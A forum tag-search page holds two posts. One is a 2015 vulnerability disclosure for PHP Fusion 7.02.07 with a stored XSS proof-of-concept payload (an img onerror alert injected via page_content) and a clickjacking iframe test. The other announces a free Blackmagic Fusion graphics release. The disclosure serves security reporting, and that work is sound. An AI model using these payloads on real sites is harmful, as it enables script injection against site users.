Search the Community
Showing results for tags 'fusion'.
-
Hi Team, #Affected Vendor: https://www.php-fusion.co.uk/home.php #Date: 04/05/2015 #Creditee: http://osvdb.org/creditees/13518-vadodil-joel-varghese #Type of vulnerability: Persistent XSS + Clickjacking #Tested on: Windows 8.1 #Product: PHP Fusion #Version: 7.02.07 #1 Cross Site Scripting x-x-x-x-x-x-x-x-x-x-x-x- #Tested Link: http://localhost/PHPfusion/files/administration/custom_pages.php?aid=68bca08161175b0e #Description: PHP Fusion is vulnerable to stored cross site scriting vulnerability as the parameter "page_content" is vulnerable which will lead to its compromise. #Proof of Concept (PoC): page_title=%22%3E%3Cimg+src%3D%22blah.jpg%22+onerror%3D%22alert%28%27pWnEd%27%29%22%2F%3E&page_access=0&page_content=%22%3E%3Cimg+src%3D%22blah.jpg%22+onerror%3D%22alert%28%27pWnEd%21%21%27%29%22%2F%3E&add_link=1&page_comments=1&page_ratings=1&save=Save+Page #2 UI redress attack x-x-x-x-x-x-x-x-x-x-x #Tested Link: http://localhost/PHPfusion/files/viewpage.php?page_id=5 #Description: PHP Fusion is vulnerable to UI redress attack as multiple transparent or opaque layers can be used to trick a user into clicking on a button or link on another page when they were intending to click on the the top level page. #Proof of Concept (PoC): <iframe src=" http://localhost/PHPfusion/files/viewpage.php?page_id=5" sanboxed width=900 height=900> Please check me out !!!! </iframe> -- Regards, *Joel V* Source
-
Pentru cei care lucreaza in domeniul graficii ( 3D modelling, animare , etc) cei de la blackmagic s-au gandit sa puna la dispozitie oricui sa descarce (versiunea free) Fusion. Exista versiunea Studio (999$) pe care au imbunatatit-o cu urmatoarele caracteristici: Advanced optical flow image analysis tools for stereoscopic 3D work, retiming and stabilization. Fusion Studio also includes support for third-party OpenFX plugins, unlimited distributed network rendering, and Generation for studio wide multi user collaboration to track, manage, review and approve shots when working with large creative teams on complex projects. Ce pot sa zic , entuziastii care lucreaza in AE ar putea sa-l incerce ; Have fun PS: Din cate stiu ( nu m-am interesat) exista o licenta de "tip unity"(Nu stiu exact denumirea) care pune o limita profitului realizat prin vanzarea produsului facut cu acest program. LINK
-
- 2015
- blackmagic
-
(and 2 more)
Tagged with: